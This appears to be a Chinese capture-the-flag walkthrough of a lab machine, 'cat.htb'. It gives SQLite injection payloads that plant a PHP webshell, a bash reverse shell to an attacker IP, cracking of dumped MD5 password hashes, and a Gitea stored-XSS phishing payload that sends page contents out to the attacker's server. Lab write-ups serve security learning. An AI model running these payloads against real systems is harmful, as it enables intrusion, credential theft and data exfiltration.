<h2 id="立足点"><a href="#立足点" class="headerlink" title="立足点"></a>立足点</h2><p>把拿到的 cookie 替换到浏览器中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">10.10.11.53 - - [19/Jul/2025 02:57:58] &quot;GET /?cookie=PHPSESSID=dg66mtcr1r8vbnb5t3c8n0o218 HTTP/1.1&quot; 200 -</span><br></pre></td></tr></table></figure>

<p>刷新，看到多了一个 Admin 的菜单，我们现在已经是管理员权限了</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719153748349.png" alt="image-20250719153748349"></p>
<p>我们回到源码，这里 snyk 审计插件也告诉了我们一处 sql 注入</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719154238622.png" alt="image-20250719154238622"></p>
<p>可以看到也很明显，试一次 insert 注入</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719154422649.png" alt="image-20250719154422649"></p>
<p>从 config 连接信息中，我们可以知道这是一个 sqlite 数据库</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">// Database configuration</span></span><br><span class="line"><span class="variable">$db_file</span> = <span class="string">&#x27;/databases/cat.db&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Connect to the database</span></span><br><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    <span class="variable">$pdo</span> = <span class="keyword">new</span> <span class="title function_ invoke__">PDO</span>(<span class="string">&quot;sqlite:<span class="subst">$db_file</span>&quot;</span>);</span><br><span class="line">    <span class="variable">$pdo</span>-&gt;<span class="title function_ invoke__">setAttribute</span>(PDO::<span class="variable constant_">ATTR_ERRMODE</span>, PDO::<span class="variable constant_">ERRMODE_EXCEPTION</span>);</span><br><span class="line">&#125; <span class="keyword">catch</span> (PDOException <span class="variable">$e</span>) &#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;Error: &quot;</span> . <span class="variable">$e</span>-&gt;<span class="title function_ invoke__">getMessage</span>());</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>我们可以利用 [SQLite Injection - Payloads All The Things](<a target="_blank" rel="noopener" href="https://swisskyrepo.github.io/PayloadsAllTheThings/SQL">https://swisskyrepo.github.io/PayloadsAllTheThings/SQL</a> Injection&#x2F;SQLite Injection&#x2F;#sqlite-remote-code-execution) 这里的 payload 执行命令</p>
<p>先在 admin 添加一个小猫</p>
<img src="https://gitee.com/ling-x5/img/raw/master/image-20250719161243864.png" alt="image-20250719161243864" style="zoom: 50%;" />

<p>在 admin 页面就可以看到 accept 请求的位置</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719161420168.png" alt="image-20250719161420168"></p>
<p>发包 burp 拦截</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/accept_cat.php</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>cat.htb</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>*/*</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>en-US,en;q=0.5</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate, br</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>19</span><br><span class="line"><span class="attribute">Origin</span><span class="punctuation">: </span>http://cat.htb</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>keep-alive</span><br><span class="line"><span class="attribute">Referer</span><span class="punctuation">: </span>http://cat.htb/admin.php</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>PHPSESSID=jno38dja2j93e6ode9sme2a8ap</span><br><span class="line"><span class="attribute">Priority</span><span class="punctuation">: </span>u=0</span><br><span class="line"></span><br><span class="line"><span class="language-apache"><span class="attribute">catName</span>=<span class="number">111</span>&amp;catId=<span class="number">1</span></span></span><br></pre></td></tr></table></figure>

<p>在 catName 处存在注入点</p>
<p>发送 payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">catName=111111&#x27;), ((SELECT CASE WHEN (1=1) THEN LIKE(&#x27;ABC&#x27;,UPPER(HEX(RANDOMBLOB(30000000)))) ELSE &#x27;a&#x27; END)) --&amp;catId=1</span><br></pre></td></tr></table></figure>

<p>url 编码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">catName=111111%27%29%2c%20%28%28%53%45%4c%45%43%54%20%43%41%53%45%20%57%48%45%4e%20%28%31%3d%31%29%20%54%48%45%4e%20%4c%49%4b%45%28%27%41%42%43%27%2c%55%50%50%45%52%28%48%45%58%28%52%41%4e%44%4f%4d%42%4c%4f%42%28%33%30%30%30%30%30%30%30%29%29%29%29%20%45%4c%53%45%20%27%61%27%20%45%4e%44%29%29%20--&amp;catId=1</span><br></pre></td></tr></table></figure>

<p>可以明显感受到延时变长</p>
<center>
    <img src="https://gitee.com/ling-x5/img/raw/master/image-20250719163946141.png" alt="image-20250719163946141" style="zoom:33%;" />
    <img src="https://gitee.com/ling-x5/img/raw/master/image-20250719164056131.png" alt="image-20250719164056131" style="zoom:33%;" />
</center>

<p>我们开始尝试写入 webshell</p>
<p>利用这个 payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ATTACH DATABASE &#x27;/var/www/lol.php&#x27; AS lol;</span><br><span class="line">CREATE TABLE lol.pwn (dataz text);</span><br><span class="line">INSERT INTO lol.pwn (dataz) VALUES (&quot;&lt;?php system($_GET[&#x27;cmd&#x27;]); ?&gt;&quot;);--</span><br></pre></td></tr></table></figure>

<blockquote>
<p>路径，我们得凭运气和感觉去 fuzz 了，因为项目源码中并没有暴露出绝对路径，这里 fuzz 不到，也就没法了</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ATTACH DATABASE &#x27;/var/www/cat.htb/lol.php&#x27; AS lol;</span><br><span class="line">CREATE TABLE lol.pwn (dataz text);</span><br><span class="line">INSERT INTO lol.pwn (dataz) VALUES (&quot;&lt;?php system($_GET[&#x27;cmd&#x27;]); ?&gt;&quot;);--</span><br></pre></td></tr></table></figure>

<p>payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">catName=111&#x27;);ATTACH DATABASE &#x27;/var/www/cat.htb/lol.php&#x27; AS lol;</span><br><span class="line">CREATE TABLE lol.pwn (dataz text);</span><br><span class="line">INSERT INTO lol.pwn (dataz) VALUES (&quot;&lt;?php system($_GET[&#x27;cmd&#x27;]); ?&gt;&quot;);--&amp;catId=1</span><br></pre></td></tr></table></figure>

<p>url 编码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">catName=111%27%29%3b%41%54%54%41%43%48%20%44%41%54%41%42%41%53%45%20%27%2f%76%61%72%2f%77%77%77%2f%63%61%74%2e%68%74%62%2f%6c%6f%6c%2e%70%68%70%27%20%41%53%20%6c%6f%6c%3b%0d%0a%43%52%45%41%54%45%20%54%41%42%4c%45%20%6c%6f%6c%2e%70%77%6e%20%28%64%61%74%61%7a%20%74%65%78%74%29%3b%0d%0a%49%4e%53%45%52%54%20%49%4e%54%4f%20%6c%6f%6c%2e%70%77%6e%20%28%64%61%74%61%7a%29%20%56%41%4c%55%45%53%20%28%22%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%24%5f%47%45%54%5b%27%63%6d%64%27%5d%29%3b%20%3f%3e%22%29%3b%2d%2d&amp;catId=1</span><br></pre></td></tr></table></figure>

<img src="https://gitee.com/ling-x5/img/raw/master/image-20250719165120686.png" alt="image-20250719165120686" style="zoom:80%;" />

<p>访问 <code>http://cat.htb/lol.php?cmd=whoami</code> </p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719165219211.png" alt="image-20250719165219211"></p>
<p>可以反弹 shell 了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cmd=bash -c &quot;bash -i &gt;&amp; /dev/tcp/10.10.14.25/9001 0&gt;&amp;1&quot;</span><br></pre></td></tr></table></figure>

<p>url 编码的 http 包</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/lol.php?cmd=bash+-c+&quot;bash+-i+&gt;%26+/dev/tcp/10.10.14.25/9001+0&gt;%261&quot;</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>cat.htb</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>en-US,en;q=0.5</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate, br</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>keep-alive</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>PHPSESSID=jno38dja2j93e6ode9sme2a8ap</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">Priority</span><span class="punctuation">: </span>u=0, i</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>成功弹回了 shell</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719170038100.png" alt="image-20250719170038100"></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>我们在源码中看到了 database 的路径，先来看看数据库吧</p>
<img src="https://gitee.com/ling-x5/img/raw/master/image-20250719195524391.png" alt="image-20250719195524391" style="zoom: 50%;" />

<p>用 <code>.table</code> 查看表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">www-data@cat:/databases$ sqlite3 cat.db </span><br><span class="line">sqlite3 cat.db                                                                   </span><br><span class="line">.table                                                                           </span><br><span class="line">accepted_cats  cats           users</span><br></pre></td></tr></table></figure>

<p>查看 users 表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">select * from users;</span><br><span class="line">1|axel|axel2017@gmail.com|d1bbba3670feb9435c9841e46e60ee2f</span><br><span class="line">2|rosa|rosamendoza485@gmail.com|ac369922d560f17d6eeb8b2c7dec498c</span><br><span class="line">3|robert|robertcervantes2000@gmail.com|42846631708f69c00ec0c0a8aa4a92ad</span><br><span class="line">4|fabian|fabiancarachure2323@gmail.com|39e153e825c4a3d314a0dc7f7475ddbe</span><br><span class="line">5|jerryson|jerrysonC343@gmail.com|781593e060f8d065cd7281c5ec5b4b86</span><br><span class="line">6|larry|larryP5656@gmail.com|1b6dce240bbfbc0905a664ad199e18f8</span><br><span class="line">7|royer|royer.royer2323@gmail.com|c598f6b844a36fa7836fba0835f1f6</span><br><span class="line">8|peter|peterCC456@gmail.com|e41ccefa439fc454f7eadbf1f139ed8a</span><br><span class="line">9|angel|angel234g@gmail.com|24a8ec003ac2e1b3c5953a6f95f8f565</span><br><span class="line">10|jobert|jobert2020@gmail.com|88e4dceccd48820cf77b5cf6c08698ad</span><br></pre></td></tr></table></figure>

<p>把他写写道文件中，处理一下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~/redTeam/htb/cat]</span><br><span class="line">└─$ <span class="built_in">cat</span> <span class="built_in">users</span></span><br><span class="line"><span class="keyword">select</span> * from <span class="built_in">users</span>;</span><br><span class="line">1|axel|axel2017@gmail.com|d1bbba3670feb9435c9841e46e60ee2f</span><br><span class="line">2|rosa|rosamendoza485@gmail.com|ac369922d560f17d6eeb8b2c7dec498c</span><br><span class="line">3|robert|robertcervantes2000@gmail.com|42846631708f69c00ec0c0a8aa4a92ad</span><br><span class="line">4|fabian|fabiancarachure2323@gmail.com|39e153e825c4a3d314a0dc7f7475ddbe</span><br><span class="line">5|jerryson|jerrysonC343@gmail.com|781593e060f8d065cd7281c5ec5b4b86</span><br><span class="line">6|larry|larryP5656@gmail.com|1b6dce240bbfbc0905a664ad199e18f8</span><br><span class="line">7|royer|royer.royer2323@gmail.com|c598f6b844a36fa7836fba0835f1f6</span><br><span class="line">8|peter|peterCC456@gmail.com|e41ccefa439fc454f7eadbf1f139ed8a</span><br><span class="line">9|angel|angel234g@gmail.com|24a8ec003ac2e1b3c5953a6f95f8f565</span><br><span class="line">10|jobert|jobert2020@gmail.com|88e4dceccd48820cf77b5cf6c08698ad</span><br><span class="line">               </span><br><span class="line">┌──(kali㉿kali)-[~/redTeam/htb/cat]</span><br><span class="line">└─$ <span class="built_in">cat</span> <span class="built_in">users</span>| <span class="built_in">tail</span> -n +2 | awk -F <span class="string">&#x27;|&#x27;</span> <span class="string">&#x27;&#123;print $2&quot;:&quot;$4&#125;&#x27;</span> | <span class="built_in">head</span> -n -1</span><br><span class="line">axel:d1bbba3670feb9435c9841e46e60ee2f</span><br><span class="line">rosa:ac369922d560f17d6eeb8b2c7dec498c</span><br><span class="line">robert:42846631708f69c00ec0c0a8aa4a92ad</span><br><span class="line">fabian:39e153e825c4a3d314a0dc7f7475ddbe</span><br><span class="line">jerryson:781593e060f8d065cd7281c5ec5b4b86</span><br><span class="line">larry:1b6dce240bbfbc0905a664ad199e18f8</span><br><span class="line">royer:c598f6b844a36fa7836fba0835f1f6</span><br><span class="line">peter:e41ccefa439fc454f7eadbf1f139ed8a</span><br><span class="line">angel:24a8ec003ac2e1b3c5953a6f95f8f565</span><br><span class="line">jobert:88e4dceccd48820cf77b5cf6c08698ad</span><br><span class="line">                                        </span><br></pre></td></tr></table></figure>

<p>john 破解一下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">john  users.hash -w=/usr/share/wordlists/rockyou.txt --format=Raw-MD5</span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 9 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])</span><br><span class="line">Remaining 8 password hashes with no different salts</span><br><span class="line">Warning: no OpenMP support <span class="keyword">for</span> this <span class="built_in">hash</span> <span class="built_in">type</span>, consider --fork=4</span><br><span class="line">Press <span class="string">&#x27;q&#x27;</span> or Ctrl-C to abort, almost any other key <span class="keyword">for</span> status</span><br><span class="line">0g 0:00:00:00 DONE (2025-07-19 08:22) 0g/s 23513Kp/s 23513Kc/s 188109KC/s  fuckyooh21..*7¡Vamos!</span><br><span class="line">Session completed. </span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">john users.hash --format=Raw-MD5 --show</span><br><span class="line">rosa:soyunaprincesarosa</span><br><span class="line"></span><br><span class="line">1 password <span class="built_in">hash</span> cracked, 8 left</span><br></pre></td></tr></table></figure>

<p>成功破解了一个 rosa 的密码，我们看一下 home 中有几个用户</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719202547271.png" alt="image-20250719202547271"></p>
<p>有 rosa，用 ssh 连接看看</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ssh rosa@cat.htb </span><br><span class="line">rosa@cat.htb<span class="string">&#x27;s password: </span></span><br><span class="line"><span class="string">Last login: Sat Jul 19 11:41:16 2025 from 10.10.16.16</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">rosa@cat:~$ </span></span><br></pre></td></tr></table></figure>

<p>成功连上了</p>
<p>netstat 看到开启了一下本地访问的其他服务</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719203425682.png" alt="image-20250719203425682"></p>
<p>我们利用 ssh 开一个 socks 代理来访问，当然也能搭建隧道，都是可以的</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssh -D 1080 rosa@cat.htb     </span><br><span class="line">rosa@cat.htb<span class="string">&#x27;s password: </span></span><br></pre></td></tr></table></figure>

<p>然后用浏览器代理配置 <code>socks5 127.0.0.1:1080</code></p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719205112226.png" alt="image-20250719205112226"></p>
<p>访问 localhost: 3000</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719205235659.png" alt="image-20250719205235659"></p>
<p>试一下 rosa 的登陆凭证，没有成功</p>
<p>从日志文件中过滤一下 password</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rosa@<span class="built_in">cat</span>:/var/log$ grep -Ri password .</span><br></pre></td></tr></table></figure>

<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./apache2/access.log.1:127.0.0.1 - - [18/Jul/2025:23:47:16 +0000] &quot;GET /join.php?loginUsername=axel&amp;loginPassword=aNdZwgC4tI9gnVXv_e3Q&amp;loginForm=Login HTTP/1.1&quot; 30</span><br><span class="line">2 329 &quot;http://cat.htb/join.php&quot; &quot;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0&quot;</span><br></pre></td></tr></table></figure>

<p>看到有 axel 的密码 <code>aNdZwgC4tI9gnVXv_e3Q</code>，登陆 web 和 ssh</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719210423054.png" alt="image-20250719210423054"></p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719210516961.png" alt="image-20250719210516961"></p>
<p>都成功登陆进来了</p>
<p>我们可以去看看 axel 的 mail 邮件了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">axel@cat:/var/mail$ cat axel</span><br><span class="line">From rosa@cat.htb  Sat Sep 28 04:51:50 2024</span><br><span class="line">Return-Path: &lt;rosa@cat.htb&gt;</span><br><span class="line">Received: from cat.htb (localhost [127.0.0.1])</span><br><span class="line">        by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S4pnXk001592</span><br><span class="line">        for &lt;axel@cat.htb&gt;; Sat, 28 Sep 2024 04:51:50 GMT</span><br><span class="line">Received: (from rosa@localhost)</span><br><span class="line">        by cat.htb (8.15.2/8.15.2/Submit) id 48S4pnlT001591</span><br><span class="line">        for axel@localhost; Sat, 28 Sep 2024 04:51:49 GMT</span><br><span class="line">Date: Sat, 28 Sep 2024 04:51:49 GMT</span><br><span class="line">From: rosa@cat.htb</span><br><span class="line">Message-Id: &lt;202409280451.48S4pnlT001591@cat.htb&gt;</span><br><span class="line">Subject: New cat services</span><br><span class="line"></span><br><span class="line">Hi Axel,</span><br><span class="line"></span><br><span class="line">We are planning to launch new cat-related web services, including a cat care website and other projects. Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.</span><br><span class="line"></span><br><span class="line">Important note: Be sure to include a clear description of the idea so that I can understand it properly. I will review the whole repository.</span><br><span class="line"></span><br><span class="line">From rosa@cat.htb  Sat Sep 28 05:05:28 2024</span><br><span class="line">Return-Path: &lt;rosa@cat.htb&gt;</span><br><span class="line">Received: from cat.htb (localhost [127.0.0.1])</span><br><span class="line">        by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S55SRY002268</span><br><span class="line">        for &lt;axel@cat.htb&gt;; Sat, 28 Sep 2024 05:05:28 GMT</span><br><span class="line">Received: (from rosa@localhost)</span><br><span class="line">        by cat.htb (8.15.2/8.15.2/Submit) id 48S55Sm0002267</span><br><span class="line">        for axel@localhost; Sat, 28 Sep 2024 05:05:28 GMT</span><br><span class="line">Date: Sat, 28 Sep 2024 05:05:28 GMT</span><br><span class="line">From: rosa@cat.htb</span><br><span class="line">Message-Id: &lt;202409280505.48S55Sm0002267@cat.htb&gt;</span><br><span class="line">Subject: Employee management</span><br><span class="line"></span><br><span class="line">We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Employee-management/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.</span><br></pre></td></tr></table></figure>

<p><code>Please send an email to jobert@localhost with information about your Gitea repository</code></p>
<p><code>http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md</code></p>
<p>我们要给 jobert 发邮件，这里我们肯定是要给他发一封钓鱼邮件。还有信息是要访问 <a target="_blank" rel="noopener" href="http://localhost:3000/administrator/Employee-management/">http://localhost:3000/administrator/Employee-management/</a> 这个项目地址。</p>
<p>在网页的右下角，有版本信息暴露给我们 <code>Gitea 1.22.0</code> </p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719211632410.png" alt="image-20250719211632410"></p>
<p>这个版本有一个存储型 <a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/52077">xss</a> 的公开漏洞 </p>
<img src="https://gitee.com/ling-x5/img/raw/master/image-20250719211922034.png" alt="image-20250719211922034" style="zoom:50%;" />

<p>创建，在随意添加一个文件，让项目有效</p>
<img src="https://gitee.com/ling-x5/img/raw/master/image-20250719212010887.png" alt="image-20250719212010887" style="zoom: 67%;" />

<p>点击 XSS test 成功弹窗，漏洞时可用的</p>
<img src="https://gitee.com/ling-x5/img/raw/master/image-20250719212147375.png" alt="image-20250719212147375" style="zoom:50%;" />

<p>开始邮件钓鱼</p>
<p>先看能不能把jobert的cookie拿到手</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719212744076.png" alt="image-20250719212744076"></p>
<p>httponly设为了true，我们没办法用javascript拿到目标cookie了，那就看看网页的内容吧</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> req1 = <span class="keyword">new</span> <span class="title class_">XMLHttpRequest</span>();</span><br><span class="line">req1.<span class="title function_">open</span>(<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md&#x27;</span>, <span class="literal">true</span>);</span><br><span class="line">req1.<span class="property">onload</span> = <span class="keyword">function</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="keyword">var</span> text = req1.<span class="property">responseText</span>;</span><br><span class="line">    <span class="title function_">fetch</span>(<span class="string">&#x27;http://10.10.14.25:8000?base64=&#x27;</span> + <span class="title function_">btoa</span>(text));</span><br><span class="line">&#125;;</span><br><span class="line">req1.<span class="title function_">send</span>();</span><br></pre></td></tr></table></figure>

<p>最终payload</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=<span class="string">&quot;javascript:(function()&#123;var req1 = new XMLHttpRequest();req1.open(&#x27;GET&#x27;, &#x27;http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md&#x27;, true);req1.onload = function() &#123;var text = req1.responseText;fetch(&#x27;http://10.10.14.25:8000?base64=&#x27; + btoa(text));&#125;;req1.send();&#125;)();&quot;</span>&gt;<span class="variable constant_">XSS</span> test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p>点击XSS test 看到是可以发请求的</p>
<img src="https://gitee.com/ling-x5/img/raw/master/image-20250719214437092.png" alt="image-20250719214437092" style="zoom:50%;" />

<p>向 jobert 发送邮件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&quot;http://localhost:3000/axel/test&quot;</span> | sendmail jobert@localhost</span><br></pre></td></tr></table></figure>

<p>接收到了base64</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719215028391.png" alt="image-20250719215028391"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># Employee Management</span><br><span class="line">Site under construction. Authorized user: admin. No visibility or updates visible to employees.</span><br><span class="line"></span><br><span class="line"># 员工管理</span><br><span class="line">网站建设中。授权用户：管理员。员工不可见或更新。</span><br></pre></td></tr></table></figure>

<p>这个 Readme.md 文件内容没什么用</p>
<p>我们接着看看网站首页 <code>http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php</code></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=<span class="string">&quot;javascript:(function()&#123;var req1 = new XMLHttpRequest();req1.open(&#x27;GET&#x27;, &#x27;http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php&#x27;, true);req1.onload = function() &#123;var text = req1.responseText;fetch(&#x27;http://10.10.14.25:8000?base64=&#x27; + btoa(text));&#125;;req1.send();&#125;)();&quot;</span>&gt;<span class="variable constant_">XSS</span> test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719220343898.png" alt="image-20250719220343898"></p>
